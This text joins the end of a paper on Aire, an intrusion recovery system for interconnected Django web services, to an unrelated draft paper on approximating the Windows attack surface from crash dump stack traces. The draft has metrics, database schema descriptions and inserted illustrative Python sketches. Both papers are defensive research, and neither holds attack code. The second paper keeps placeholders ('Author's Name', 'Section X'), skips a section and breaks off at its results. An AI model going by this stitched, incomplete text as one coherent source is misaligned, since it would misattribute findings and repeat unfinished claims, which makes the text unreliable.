Repair takes longest on Askbot, and it is the last to finish local repair. In our unoptimized prototype, repair for each request is ~10× slower than normal execution. This is because the repair controller and the replayed web service are in separate processes and communicate with each other for every Django model operation; optimizing the communication by co-locating them in the same process should improve repair performance.

9 Discussion and limitations

Aire recovers the integrity of a system after an attack by undoing unauthorized writes, but it cannot undo damage resulting from unauthorized reads, such as an attack that leaked confidential information. However, Aire could be extended to help an administrator identify leaks, so he can take remedial action; for example, if the administrator marked confidential data for Aire, Aire could notify him of reads that returned confidential data only during original execution but not during repair.

Aire's repair log and database of versioned Django model objects grow in size over time, and eventually garbage collection of old versions becomes necessary.
When the administrator of a service determines that logs prior to a particular date are no longer needed, Aire performs garbage collection by deleting repair logs and versions of database rows before that date. Once garbage collection is done, Aire cannot repair requests to the service prior to that date; if a client issues a repair operation on a request whose logs were garbage collected, Aire treats the service as permanently unavailable and notifies the client’s administrator. Our current prototype does not support simultaneous normal execution and repair. When repair is invoked on a service, Aire stops normal operation, switches the service into repair mode, completes local repair, and switches it back to normal operation. Our implementation could be extended to support simultaneous normal execution and repair similar to Warp’s repair generations [7]. 10 Related work The two closest pieces of work to Aire are the Warp [7] and Dare [16] intrusion recovery systems. Warp focuses on recovery in a single web service and is the inspiration for Aire’s local recovery. Aire additionally tracks attacks that spread across services and recovers from them, and defines a model for reasoning about partially repaired state. Dare performs intrusion recovery on a cluster of machines. However, Dare’s repair is synchronous and assumes that all machines are in the same administrative domain; both of these design decisions are incompatible with web services, unlike Aire’s asynchronous repair. Some web services, like Google Docs and Dropbox, already allow a user to roll back their files and documents to a previous version. Aire provides a more powerful recovery mechanism that tracks the spread of an attack across services and undoes all effects of the attack while preserving subsequent legitimate changes. After a compromise, Polygraph [19] recovers the non-corrupted state in a weakly consistent replication system by rolling back corrupted state. 
However, unlike Aire, it does not attempt to preserve the effects of legitimate actions, which can lead to significant data loss. Heat-ray [8] considers the problem of attackers propagating between machines within a single administrative domain, and suggests ways to reduce trust between machines. On the other hand, Aire is focused on attackers spreading across web services that do not have a single administrator, and allows recovery from intrusions. Techniques such as Heat-ray’s could be helpful in understanding and limiting the ability of an adversary to spread from one service to another. Akkus and Goel’s system [5] uses taint tracking to analyze dependencies between HTTP requests and database elements, and uses administrator guidance to recover from data corruption. However, unlike Aire, it can recover only from accidental corruption and not attacks, and it cannot handle attacks that spread across services. The user-guided recovery system of Simmonds et al. [21] recovers from violations of application-level invariants in a web service and uses compensating actions and user input to resolve these violations. However, it cannot recover from attacks or accidental data corruption. Past work on distributed debugging [4] intercepts executions of unmodified applications and tracks dependencies for performance debugging, whereas Aire tracks dependencies for recovery. 11 Conclusion This paper presented Aire, an intrusion recovery system for interconnected web services. Aire introduced three key techniques for distributed repair: (1) a repair protocol to propagate repair across services that span administrative domains, (2) an asynchronous approach to repair that allows each service to perform repair at its own pace without waiting for other services, and (3) a contract that helps developers reason about states resulting from asynchronous repair. 
We built a prototype of Aire for Django and demonstrated that porting existing applications to Aire requires little effort, that Aire can recover from four realistic attack scenarios, and that Aire’s repair model is supported by typical web service APIs. Acknowledgments We thank Frans Kaashoek, Eddie Kohler, the anonymous reviewers, and our shepherd, Michael Walfish, for their help and feedback. This research was supported by the DARPA Clean-slate design of Resilient, Adaptive, Secure Hosts (CRASH) program under contract #N66001-10-2-4089, and by NSF award CNS-1053143. References
Attack Surface Prioritization with Crash Dump Stack Traces

Author's Name, Affiliation

Abstract

Resource limitations often preclude security professionals from reviewing, testing, and fortifying an entire code base. Identifying metrics that enable prioritization of security efforts would help practitioners discover security issues more efficiently. Risk-Based Attack Surface Approximation (RASA) makes use of crash dump stack traces from a targeted software system to provide an estimated attack surface. In this paper, we extend the RASA approach to develop a series of metrics that could help identify how the attack surface changes and whether areas of the attack surface have more dangerous vulnerabilities. The goal of this research is to aid software engineers in approximating the attack surface of software systems by developing metrics based on crash dump stack traces. We present the RASA approach and three metrics based on crash dump stack traces: change, complexity, and boundary metrics. We parsed 24.5 million stack traces from Windows 8, 8.1, and 10 for inclusion in our study. With change metrics, we help security professionals identify code that has fallen off or been added to the attack surface of the target system. For example, 58.7% of code that was seen on crash dump stack traces changed from Windows 8.1 to Windows 10. With complexity metrics, we measure fan-in and fan-out from crash dump stack traces to determine whether certain vulnerabilities are more impactful than others. With boundary metrics, we determine where the boundary of the software system is, or where crash dump stack traces indicate entry and exit points to the system might be. We determined that only 4% of vulnerabilities fixed for Windows 8.1 appeared on the boundary of the system.

1. Introduction

For security teams, prioritizing code to review and/or test can improve a team's ability to find and remove vulnerabilities. Some organizations may choose to prioritize security efforts based on their perception or knowledge of whether the vulnerability is on the attack surface of a system. Researchers have suggested methods for identifying the attack surface of a system in an efficient manner for practitioners [1-4]. However, identifying code on the attack surface of a system is only a partial solution. Beyond the attack surface, how should security professionals prioritize efforts? Many organizations already collect empirical metrics for their software systems, such as crash dump stack traces. In this work, we propose that organizations use this existing dataset to prioritize security efforts, and we generate metrics derived from crash dump stack traces to help practitioners further prioritize their efforts. We hypothesize that:

Crash dump stack traces could be used to approximate how the attack surface of a system changes over time. Crash dump stack traces can be collected over the lifespan of software systems. By comparing traces from different versions of software systems, security professionals can observe how the profile of crashing code has changed, and use that information to update their understanding of critical security points in the system. Similar analysis can be performed between different time periods of development.

Crash dump stack traces can identify flawed data paths in a software system, and identify which code artifacts carry more risk of being exploited. By providing fan-in (number of incoming calls to code) and fan-out (number of outgoing calls from code) measurements based on crash dump stack traces to security professionals, we can express whether a specific code artifact is more or less exposed to flawed data paths.
Because we know that any crash dump stack trace indicates some sort of flaw, an increase in fan-in and fan-out numbers based on crash dump stack traces indicates potentially riskier code. Finally, code on entry and exit points of a software system is more likely to contain security vulnerabilities than the rest of the codebase. While some researchers have focused on identifying entry and exit points, or the boundary, to secure [5], others have advocated for a defense-in-depth approach to security [6]. Crash dump stack traces can identify the boundary of a software system by identifying where the traces change from external code to system code. To evaluate these hypotheses, we pose the following research questions:

**RQ1:** How effectively can stack traces be used to approximate the attack surface of a system?

**RQ2:** How does the code that is seen on crash dump stack traces drop off, get added, and stay the same across versions and during development of software systems?

**RQ3:** How are security vulnerabilities correlated with code complexity, as measured by fan-in and fan-out metrics?

**RQ4:** How often are vulnerabilities seen on the entry and exit points of a software system compared to the rest of the codebase?

We analyzed 24.5 million stack traces from crash dumps from Windows 8, 8.1, and 10 from 2014 and 2015, and developed metrics in three categories: change metrics, complexity metrics, and boundary metrics. We correlated these metrics with security vulnerabilities found in the Windows codebase over the same time period. This correlation was used to make observations about the effectiveness of each metric. We include the following as contributions in this paper:

- An exploration of the change in attack surface over time, as determined by crash dump stack traces.
- Results from a case study indicating the impact of vulnerabilities in a software system and the complexity of specific files.
- A database schema to facilitate repeatable analysis of crash dump stack traces against vulnerability locations.

The rest of the paper is organized as follows: Section 2 discusses background and related work, Section 3 presents our methodology, Section X discusses the specific case study presented in this work, Section X presents our results, Section X contains discussion of these results, Section X discusses our lessons learned and challenges, Section X presents limitations and threats to validity, Section X discusses future work, and Section X concludes.

### 2. Related Work

Vulnerabilities are a special case of software defects [7]. Vulnerabilities tend to be sparser than general software defects [8], as not all defects may allow an attacker to gain anything. In this section, we provide a brief overview of related work.

### 2.1. Attack Surface

Howard et al. [9] provided the seminal definition of attack surface using three dimensions: targets and enablers, channels and protocols, and access rights. Not all areas of a system may be directly or indirectly exposed to the outside. Some parts of a complex system, such as the Windows operating system, may be for internal use only and cannot be reached or exploited by an attacker. Knowing the attack surface of a piece of software supports decision-making during all phases of software development. To date, approaches to empirical measurement of attack surfaces have relied on manual effort or on alternative definitions of ‘attack surface’. Tools like Microsoft’s Attack Surface Analyzer⁴ determine where potential input vectors exist on a system. However, this tool currently focuses on delivered systems that are code-static; it detects configuration changes, not code changes. Manadhata et al. [1] describe how an attack surface might be approximated by looking at API entry points. However, this approach does not cover all exposed code, as the authors mention.
Specifically, internal flow of data through a system could not be identified. While the external points of a system are a useful place to start, they do not encompass the entirety of exposed code in the system. These intermediate points within the system could also contain security vulnerabilities that the reviewer should be aware of. Further, their approach to measuring attack surfaces required expert judgment and manual effort. Later, Younis et al. [10] analyzed the relationship between the attack surface of Apache HTTP Server and the density of vulnerabilities in the system. Munaiah et al. [4] used call graphs to determine the proximity of security vulnerabilities to the attack surface of the software system, and found that vulnerabilities tended to cluster near areas of the call graph considered on the attack surface of the system. Younis et al. [11] used reachability analysis alongside entry points to determine how exploitable specific vulnerabilities were, combining the concepts above. Theisen et al. [3] developed Risk-Based Attack Surface Approximation (RASA), which uses crash dump stack traces to estimate the attack surface of a target system.

### 2.2. Exploiting Stack Traces

The use of crash reporting systems, including stack traces from the crashes, is becoming a standard industry practice² [12, 13]. Bug reports contain information to help engineers replicate and locate software defects. Liblit and Aiken [14] introduced a technique for automatically reconstructing complete execution paths using stack traces and execution profiles. Later, Manevich et al. [15] added data flow analysis information to Liblit and Aiken’s approach. Other studies use stack traces to localize the exact fault location [12, 16, 17]. Lately, an increasing number of empirical studies use bug reports and crash reports to cluster bug reports according to their similarity and diversity; e.g., Podgurski et al. [18] were among the first to take this approach.
Other studies followed [13, 19]. Not all crash reports are precise enough to allow for this clustering. Guo et al. [20] used crash report information to predict which bugs will get fixed. Bettenburg et al. [21] assessed the quality of bug reports to suggest better and more accurate information helping developers to fix the bug. Crash dump stack traces have been used as an empirical metric for localizing security vulnerabilities. Theisen et al. [3] used crash dump stack traces from Windows to generate an approximation of the attack surface of Windows, called a risk-based attack surface approximation. In that study, 48.4% of binaries appeared on at least one crash dump stack trace, while 94.8% of post-release vulnerabilities were fixed in that 48.4% subset of binaries. Their result allows security professionals to prioritize security efforts somewhat, but half of the binaries in a software system is not a practical reduction in review for many software teams.

### 2.3. Security Vulnerabilities

With respect to vulnerabilities, Huang et al. [22] used crash reports to generate new exploits while Holler et al. [23] used historic crash reports to mutate corresponding input data to find incomplete fixes. Kim et al. [24] analyzed security bug reports to predict “top crashes”—those few crashes that account for the majority of crash reports—before new software releases. Massacci et al. [25] provided suggestions on how to select good systems for studies about vulnerabilities. Meneely et al. [26] explored how Linus’s law affected the generation of security vulnerabilities, and found correlations between more authors of a piece of code and an increase in vulnerabilities in that code. Meneely et al. [27] later strengthened this evidence by confirming the result for additional sources. A variety of research has focused on using various properties of software to target vulnerable code. Scandariato et al. [28] used text mining techniques to predict vulnerable components.
RASA also uses text mining techniques, specifically to parse crash dump stack traces to gain insights. Smith et al. [29] used SQL hotspots as a heuristic for identifying vulnerabilities. Theisen et al. [3] used crash dump stack traces as a heuristic for localizing security vulnerabilities. Based on the corpus of research in this area, we believe that using empirical software measurements and heuristics is a promising research direction for prioritizing code with security vulnerabilities. Making economically informed decisions on where security vulnerabilities might be could save organizations critical security effort man-hours and resources while finding vulnerabilities before they affect end users.

### 3. Risk-Based Attack Surface Approximation

Theisen et al. [3] developed RASA, which uses crash dump stack traces to estimate the attack surface of a target system. Stack traces from crash dumps represent user activity that put the system into an unexpected state. As indicated by prior research outlined in section 2.1, researchers have focused on the edge of systems when computing the attack surface. Computing the entire attack surface of a target system is labor-intensive. By using empirical metrics for approximation, RASA is able to approximate the entire attack surface of the target system. To compute the RASA approach for a target system, a collection of stack traces from crash dumps is collected from the software system we are analyzing. These stack traces are chosen from a set period of time. For each individual stack trace pulled from a crash dump, we isolate the binary, file, or function on each line of each stack trace, and record what code artifact was seen and how many times it has been seen in a stack trace. Each of the code artifacts from stack traces should then be mapped to a code artifact in the system. For example, if the file foo.cpp appears in a stack trace, the matching foo.cpp in the system should be identified.
A software system may have multiple foo.cpp files, so a method for identifying which foo.cpp was in the crash is required. A list of code artifacts in a software system could come from toolsets provided by the company maintaining the system or pulled directly from source control, in the case of open source projects. Next, RASA parses each individual stack trace in the dataset, and sequentially extracts the individual code artifacts that appear on each line of the trace. To tie stack trace appearances to the codebase, RASA generates a mapping from each stack trace line to a code artifact in the system. Formalizing a database schema for the storage of stack traces from the target software system is the next step for an experimental setup, as proper indexes on these tables can then be created for faster queries and faster experimentation. The full database diagram for our collection of crash dump stack traces can be seen in Figure 2. The starting point for the database design is the “StackTraces” table, which contains all of the stack traces that are collected for these experiments. One individual record in the “StackTraces” table represents a single line of a single stack trace, with individual stack traces having a unique “stack_thread_id.” As an example, an individual stack trace with 22 lines in it would have 22 records in “StackTraces”, with a unique “stack_id” for each line and a single “stack_thread_id” for the 22 records. Crashes can contain multiple stack traces from different threads that are running at the time of the crash, so each stack trace record is mapped to a specific crash, organized in the “Crashes” table. Having separate tables for crashes and stack traces allows users to look for potential correlations with stack trace types that frequently appear together in the same crash. Each “Crashes” record is mapped to a specific version of Windows, itemized in the “Products” table.
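The core tables just described can be sketched in SQLite. This is an illustrative assumption, not the actual Microsoft-internal schema: the column names and types here are invented for the sketch, keeping only the table names and relationships stated above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE Products (
    product_id  INTEGER PRIMARY KEY,
    name        TEXT NOT NULL              -- e.g. 'Windows 8.1'
);
CREATE TABLE Crashes (
    crash_id    INTEGER PRIMARY KEY,
    product_id  INTEGER NOT NULL REFERENCES Products(product_id)
);
-- One record per line of a stack trace; all lines of one trace share
-- a stack_thread_id, and each trace belongs to exactly one crash.
CREATE TABLE StackTraces (
    stack_id        INTEGER PRIMARY KEY,
    stack_thread_id INTEGER NOT NULL,
    crash_id        INTEGER NOT NULL REFERENCES Crashes(crash_id),
    line_no         INTEGER NOT NULL,
    binary_name     TEXT
);
""")

# A crash must exist before its stack trace lines can reference it.
conn.execute("INSERT INTO Products VALUES (1, 'Windows 8.1')")
conn.execute("INSERT INTO Crashes VALUES (100, 1)")
for i, b in enumerate(["app.exe", "foo.dll", "ntdll.dll"]):
    conn.execute("INSERT INTO StackTraces VALUES (?, 7, 100, ?, ?)",
                 (i + 1, i, b))

rows = conn.execute(
    "SELECT COUNT(*) FROM StackTraces WHERE stack_thread_id = 7").fetchone()
print(rows[0])  # one 3-line trace -> 3 records
```

Inserting the crash before its trace lines mirrors the ordering constraint discussed next.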
For both the “StackTraces” to “Crashes” mapping and the “Crashes” to “Products” mapping, a matching “Crashes” record or “Products” record must be assigned for a new “StackTraces” or “Crashes” record to be created. Because of this, we add each crash to the database first, then add the associated stack traces to the database. In addition to mapping stack traces and crashes to specific products, we also map individual code artifacts at the binary, file, and function level to specific artifacts in versions found in the “Products” table. Each level of granularity of code artifacts has its own associated table: “Binaries”, “Files”, and “Functions”, respectively. Each of these artifacts is given its own unique identifier and is mapped to a specific version of Windows in the “Products” table. Similar to the “Crashes” mapping for the “StackTraces” table, new stack traces placed into “StackTraces” must have a valid entry in the “Binaries”, “Files”, and “Functions” tables. This mapping is performed by using string parsing to determine what the correct name is for each line in the stack trace. While mapping binary names to binaries is straightforward, as binaries must have unique names, mapping file and function names from stack trace entries to files and functions in the target system is more difficult, due to the duplication of names of files and functions. To circumvent issues with mapping file and function names to their place in the system, we map code names in the following order: first binaries, then files, then functions. In this way, we can use the higher-level association to help our mapping technique in subsequent steps. This extra mapping step is assisted by the “BinaryFileMap” and “FunctionMap” tables. In the “BinaryFileMap” table, we associate specific “rp_id” (an internal convention to uniquely identify files in the Windows products) with specific “binary_id” entries.
In the case of a file name that is not unique, we use the “BinaryFileMap” information to determine which unique file is being referenced. Similarly, for functions, we associate specific “function_id” entries to the “binary_id” and “rp_id” that the function is contained in. By performing function mapping last, we can use the previously parsed binary and file data for a specific stack trace record to determine which specific function is being referenced by the stack trace. In the case where we are unable to perform this mapping, each table has an “Unknown” record that these failed mappings are placed in, which satisfies the database schema. Each level of granularity has a frequency table, specified as “BinaryFrequency”, “FileFrequency”, and “FunctionFrequency.” Each table has a unique entry for each code artifact for each product. For each record, we then track three different values, used in our later metric generation step. “Edge_count” tracks, as a list, how many unique incoming and outgoing edges a specific instance of a code artifact has. For example, if there are 5 unique ways to call into “foo.cpp”, then “edge_count” would have a value of 5 for the incoming entry in the list. “Crash_count” tracks how many times a code artifact appears in a unique crash. For our “foo.cpp” example, appearing in 8 different crashes would mean the “crash_count” value would be set to 8. Note that this counts unique occurrences across crashes; if “foo.cpp” appears 6 times in a single crash, it would only contribute one additional occurrence of “foo.cpp” to the “crash_count” entry. Finally, “stackLine_count” is a count of the total number of times a code artifact appears in our datasets, with multiple occurrences in the same crash adding multiple entries.
In our previous example of 6 occurrences of “foo.cpp” in a single crash, that would result in adding 6 to the “stackLine_count” entry for “foo.cpp.” Finally, we map security bug information to specific code artifacts found during our parsing of crash dump stack traces. We collected security bug information at the file level, and map the bug information to the “Files” table directly, along with the product the bug was found in via the “Products” table. Individual bugs are also defined as pre-release or post-release, depending on when the bug was found during the development process. Pre-release is defined as bugs found in code before its official release to customers, where official does not include customer alpha or beta releases. Post-release is defined as bugs found in code after an official release. We use post-release bugs as our vulnerabilities for the rest of this study. Using the “BinaryFileMap” and “FunctionMap” tables described previously, we can map individual security bugs to binaries and functions in addition to the direct mapping we have to files. Mapping security bugs to specific code artifacts gives us a goodness measure for the use of crash dump stack traces, where better coverage of post-release vulnerabilities means that our approach is performing better.

### 5. Attack Surface Metrics

While a measure of the code that could potentially contain vulnerabilities could be a useful metric for developers, we also explore additional types of metrics that could be gathered from crash dump stack traces. We define three new metrics identified from crash dump stack traces that software developers could use to improve maintenance efforts in codebases: change, complexity, and boundary metrics. All of the metrics can be measured at any of three levels of granularity (binary, file, and function), depending on need. Stack traces from crash dumps typically contain at least one of these levels of granularity. 5.1.
Change Metric Determining how software systems change over time is important for security professionals, as many security vulnerabilities are introduced as software changes. As new features are added by engineers to satisfy new requirements, vulnerabilities could be introduced alongside those new features, unbeknownst to the developers. While security reviewers could catch many potential vulnerabilities as these changes are flagged and inspected in source control systems, this process is still a very manual one for many organizations. For example, a common workflow for many organizations is to have developers flag changes they make as potentially security relevant, so security teams can then review the code. However, developers may not realize that a change they are making has security implications, as many developers have no background in security work. Therefore, introducing methods for automatic review of potential security issues would be desirable. To that end, change metrics represent how much the crash data has changed between two approximations. Determining what binaries, files, and functions have changed from version to version will help security professionals focus efforts on code that has been newly introduced to the attack surface of a software system. Code that is newly appearing on the attack surface will typically have not been reviewed as stringently by the security team, if it was reviewed by the security team at all. Future iterations of this metric could include month to month changes as well, with the inclusion of dates on specific crashes. We track the amount of code that appears in different versions of Windows to calculate our change metrics. 
Our three metrics are defined as follows: First Only (FO) is defined as the code artifacts that only appear in the earlier (older version, previous time period) part of the comparison, and is expressed in equation 3: \[ FO = \text{code in first part of comparison} \] Second Only (SO) is defined as the code artifacts that only appear in the later (newer version, next time period) part of the comparison, and is expressed in equation 4: \[ SO = \text{code in second part of comparison} \] In Both (IB) is defined as the code artifacts that appear in both parts of the comparison, and is expressed in equation 5: \[ IB = \text{code in both parts of comparison} \] These metrics are generated using data from the appropriate time and version of the target software system. For example, if you wanted to compare the attack surface of a system in Windows 8 versus Windows 8.1, you would collect crash dump stack traces from those two versions, create RASA for both, and compare the results using the above metrics. A similar approach is used to compare different time periods for products under development, such as 2014 and 2015 for Windows 10.

### 5.2. Complexity Metric

Not only do stack traces contain the individual code artifacts that appeared in a crash, they also preserve the order in which that code was accessed leading up to the crash. This order can indicate the complexity of individual code artifacts that appear in failure cases of the software. We can determine, for specific code artifacts, how many different code entities immediately precede that entity in crashes, and how many code entities immediately follow that entity in crashes.
The count of how many different code entities immediately precede a code entity in crashes is referred to as a “fan-in measure,” while the count of how many code entities immediately follow a code entity in crashes is referred to as a “fan-out measure.” Using these “fan-in” and “fan-out” measures as a measure of the complexity of specific code artifacts could be useful for software developers to identify points of failure in the software system. Additionally, these measures of complexity could be used to provide an estimation of the overall impact of specific security vulnerabilities. Code artifacts with higher “fan-in” and “fan-out” values may need to be prioritized for vulnerability fixes, as the greater span of possible flows through that code artifact could indicate vulnerabilities with more severe consequences for the software system. Therefore, the complexity metric is based on the fan-in and fan-out measures for a code entity. As an example, if binaries X, Y, and Z appear directly after binary A in stack traces, binary A has three “outgoing” edges. The frequency with which a specific entity appears after another can also be measured. We report the ratio of the number of times each permutation of complexity appears in the codebase, and how many of those complexity types have security vulnerabilities associated with them. As an example, if one complexity type has 100 occurrences, and there are 30 vulnerabilities in those occurrences, then we claim that complexity type has a 30% rate of vulnerability. These ratios are defined in two metrics, Shape Fanning (SF) and Vulnerability Fanning (VF). For SF, we use the number of incoming and outgoing calls from a code artifact as inputs for the calculation of the metric. These inputs are defined as FanIn and FanOut, respectively, and are measured via the code that immediately precedes and follows an entity in crash dump stack traces.
For SF, we calculate individual values for each permutation of FanIn and FanOut values, as seen in equation 6: \[ SF(X,Y) = \frac{\text{artifacts with } X \text{ FanIn and } Y \text{ FanOut}}{\text{total number of code artifacts}} \] For VF, we calculate individual values for each permutation of FanIn and FanOut values, as seen in equation 7: \[ VF(X,Y) = \frac{\text{vulns with } X \text{ FanIn and } Y \text{ FanOut}}{\text{total number of vulns.}} \]

### 5.3. Boundary Metric

Boundary metrics determine what system-specific entities appear first after outside entities, and which outside entities are seen directly before code entities in the software system under study. This boundary could be useful for determining which code entities to focus hardening and testing efforts on, while the outside list may indicate which third parties are causing the most issues for end users. Determining what outside binaries are seen most frequently in crashes, and how frequently those binaries are associated with security fixes, would be a useful metric for software engineers. As an example, if specific outside programs are causing the most issues for a system, then software teams can focus maintenance efforts on those areas. Additionally, the organization can reach out to the developers of those programs to help them make better use of the interfaces provided by the software. Therefore, we measure the number of vulnerabilities that appear on the boundary of a target system by analyzing crash dump stack traces. We identify the boundary from the stack traces by flagging which binaries are directly related to the target system versus which binaries are external to the system. Typically, the first few binaries in the stack trace will be external, and the trace will eventually change over to system code. We identify the changeover to system binaries, and mark the first occurrence of system code as the boundary.
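The changeover detection just described can be sketched as follows. The `is_windows` predicate and the binary names are hypothetical stand-ins for the internal flagging of system-related binaries; the real classification inside Microsoft is more involved.

```python
def boundary_binary(trace, is_windows):
    """Return the first system-related binary that follows a
    non-system-related one in a trace, or None if no changeover occurs."""
    seen_external = False
    for binary in trace:           # read the trace top-down
        if is_windows(binary):
            if seen_external:
                return binary      # changeover: this binary is the boundary
        else:
            seen_external = True
    return None

# Illustrative flag set and trace; external code first, then system code.
windows_binaries = {"ntdll.dll", "kernel32.dll"}
trace = ["thirdparty.exe", "plugin.dll", "kernel32.dll", "ntdll.dll"]
print(boundary_binary(trace, lambda b: b in windows_binaries))
# kernel32.dll marks the boundary for this trace
```

Traces that contain only system code yield no changeover and are left off the boundary set.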
We then calculate our boundary metric, Boundary Vulnerability Rate (BVR), via the following equation: \[ BVR = \frac{\text{vulns. on the boundary of the system}}{\text{total number of vulns.}} \] From this metric, software developers can make data-informed decisions on whether to focus maintenance efforts on the boundary of their system, where their code interacts directly with outside developers, or on other sections of the codebase.

### 6. Case Study Methodology

In this section, we present data collection methodology specific to the Windows study performed for this paper.

### 6.1. Stack Trace Collection and Parsing (RQ1)

Each line of a stack trace is organized as follows. The binary is shown at the beginning of the string, followed by a “!” delimiter and the function name. In the square brackets, the full path of the file associated with this binary/function relationship is shown. Not all stack traces will include the name of the source file. Some stack traces may even display anonymous placeholders for functions and binaries, depending on the permissions and ability to identify these details during runtime. For example, Windows stack traces contain no details about artifacts outside Windows, e.g. an external application causing the crash. Each stack trace is parsed and separated into individual artifacts, including binary name, function name, and file name. We then map each of these artifacts to code as they are named in Microsoft’s internal software engineering tools. File information is not always available. In these cases, we make use of software engineering data indicating relationships between binaries, files, and functions to find the missing data if possible. If these symbol tables contain the function name referenced by the stack trace, we pull the corresponding source file onto the attack surface. In case the function name is not unique, e.g.
overloading the function in multiple files, we over-approximate the attack surface and pull all possible source files onto the attack surface. If no function name can be found, e.g. a function not shipped with Windows, we leave the file marked as unknown. Thus, this approach generates an attack surface that approximates reality. Over-approximating the attack surface aims for completeness rather than minimization of size. The accuracy of an attack surface depends on the accuracy and completeness of the analyzed crash data. When code is seen in a stack trace, we place information about that code into a database table containing all code on the attack surface approximation. When this code is added to the database, we enter as much information as possible about the line in the stack trace. In some cases, this is just the binary, as the file and function cannot be mapped. Other cases may have the exact file and/or function. We also collect frequency and neighbor metrics for each entity. This data can be used in a variety of helpful ways, particularly in visualizing these relationships in graph format as seen in Figure 1. If data about a level of granularity is missing from the stack trace, this data may be able to be extrapolated from the data that is present. For example, if a file and line number is provided in the stack trace, the binary can be determined by the name of the file and the function can be determined from the line number in the file. When doing mapping from stack traces to actual entities within the system, sometimes mappings cannot be made. Two examples are errors that occur while storing the stack trace, such as when the system is under duress, and names that do not match between the crash report and data about the system. When a mapping cannot be made, we label that entity as “unknown,” and do not place that entity on the attack surface.
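The “binary!function [file]” line format described above can be parsed with a short routine. The regular expression and the “unknown” fallback are assumptions of this sketch, not the actual internal parser, and the example path is invented.

```python
import re

# "binary!function [path]", where the bracketed file path is optional.
LINE_RE = re.compile(r"^(?P<binary>[^!]+)!(?P<function>[^\[\]]+?)"
                     r"(?:\s*\[(?P<file>[^\]]+)\])?\s*$")

def parse_line(line):
    """Split one stack trace line into binary, function, and file names,
    falling back to 'unknown' when a component cannot be recovered."""
    m = LINE_RE.match(line.strip())
    if not m:
        return {"binary": "unknown", "function": "unknown", "file": "unknown"}
    return {
        "binary": m.group("binary"),
        "function": m.group("function").strip(),
        "file": m.group("file") or "unknown",  # file info is often missing
    }

print(parse_line(r"foo.dll!BarFunc [d:\src\bar.cpp]"))
print(parse_line("foo.dll!BarFunc"))  # no file info -> file is "unknown"
```

Lines that fail to parse fall into the “unknown” records described above rather than being dropped.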
For this work, we specifically remove hardware-related crashes, as errors resulting from hardware failures do not indicate a potential input vector for attackers. The identification of hardware crashes is done by an automated stack trace classification system within Microsoft. Code that is inaccessible by user activity cannot be manipulated by an attacker, and is therefore not considered to be on the attack surface. This assumption carries forward when discussing our results below. The ultimate output used by the development and security teams is a classification of whether an entity is on or off the attack surface. This classification can be used for prioritizing defect fixing and validation and verification efforts.

### 6.2. Data Sources

To improve on previous work by researchers [3], larger datasets were required for sufficient samples to work from. The dataset from the summer 2015 work consists of approximately 24.5 million stack traces from 2014 and 2015 from Windows 8, 8.1, and 10, illustrated by Table 1. These crashes represent approximately 500 million records in our database, with a single line in a crash dump represented by a single record. On average, each crash dump has 20 lines or records.

Table 1. Number of crash dump stack traces parsed in 2014 and 2015, by OS version.

|      | Windows 8 | Windows 8.1 | Windows 10  |
|------|-----------|-------------|-------------|
| 2014 | 5 million | 3.5 million | 1 million   |
| 2015 | 4 million | 5.5 million | 5.5 million |

Stack traces in Windows typically contain binary/function information, and file information is filled in based on a mapping process. In most cases, a single binary/function pair will map to a single file. In the case of multiple mappings, we take the first match. 6.3.
Change Metric Generation (RQ2) We calculate the FO, SO, and IB metrics for three different comparisons: Windows 8 to 8.1, Windows 8.1 to 10, and Windows 10 (2014) to 10 (2015). The first two comparisons represent how the attack surface of Windows, as calculated by RASA, changes across major version updates. The Windows 10 (2014) to 10 (2015) comparison represents how the attack surface of Windows, as calculated by RASA, changes while a product is under development. We report the number of files seen for each metric, along with the percentage of the total files seen across both parts of the comparison that fall into each of the three metrics. While we cannot report what specific binaries, files, and functions were removed from RASA and added to RASA, this data would be available to Windows security team members to make informed decisions on what code to add to regular review and what code to remove from regular review.

### 6.4. Complexity Metric Generation (RQ3)

We use the “ShapeEdge” tables from our database to generate our complexity metrics. Using the “edge” entries, we can determine the number of unique incoming and outgoing calls to a specific code artifact at the binary, file, and function levels of granularity. For each code artifact, we store the unique incoming and outgoing calls into a temporary table, and then determine if there are any post-release security bugs associated with the code artifact in question. If there is at least one security bug, we label that artifact with a 1. After the result table has been generated, it can be used to generate supporting visualizations or charts for developers and managers.
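The fan-in/fan-out derivation can be sketched as below, assuming each trace has already been reduced to an ordered list of artifact names; the names here are illustrative, and only unique neighbors are counted, as in Section 5.2.

```python
from collections import defaultdict

def fan_metrics(traces):
    """Count unique immediate predecessors (fan-in) and successors
    (fan-out) for each code artifact across a set of stack traces."""
    fan_in, fan_out = defaultdict(set), defaultdict(set)
    for trace in traces:
        for prev, cur in zip(trace, trace[1:]):
            fan_out[prev].add(cur)   # cur immediately follows prev
            fan_in[cur].add(prev)    # prev immediately precedes cur
    return ({k: len(v) for k, v in fan_in.items()},
            {k: len(v) for k, v in fan_out.items()})

# Mirrors the Section 5.2 example: X, Y, and Z appear directly after
# binary A in traces, so A has three outgoing edges.
traces = [["A", "X"], ["A", "Y"], ["A", "Z"]]
fi, fo = fan_metrics(traces)
print(fo["A"])  # 3
```

Joining these counts against the security bug labels would then give the 0/1-labeled result table described above.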
Examples could include pivot tables indicating the density of vulnerabilities in combinations of incoming and outgoing calls, heatmaps showing how combinations of incoming and outgoing calls are correlated with vulnerabilities, or the ability to look at specific binaries, files, and functions and determine whether the number of incoming and outgoing calls has changed. For this study, we generate a pair of heatmaps displaying all of the permutations of incoming and outgoing calls, and the distribution of each of these permutations throughout the codebase. This type of visualization could be useful for identifying trends in code structure, and for determining whether certain structures are more or less likely to have security vulnerabilities.

6.5. Boundary Metric Generation (RQ4)

We determine boundary metrics for Windows by identifying which Windows-specific entities appear first after external entities, and which external entities are seen directly before Windows entities. This edge was determined by flagging each individual binary seen in our dataset as “Windows Related” or “Non Windows Related.” For each stack trace, we read each individual line, noting when this flag switched from “Non Windows Related” to “Windows Related” during a crash. This changeover was marked as the “boundary” for each stack trace. After this boundary is set, we can then determine the percentage of vulnerabilities that appear on this boundary.

7. Results

In this section, we present the results of our investigation of each research question.

7.1. RQ1: Crash Dump Stack Trace Metric

Table 3 contains a summary of the results from running RASA on Windows 8, Windows 8.1, and Windows 10 on a set of crash dump stack traces from 2014 and 2015. We excluded Windows 10 in 2014 due to the small number of crashes available, as Windows 10 was still in development.
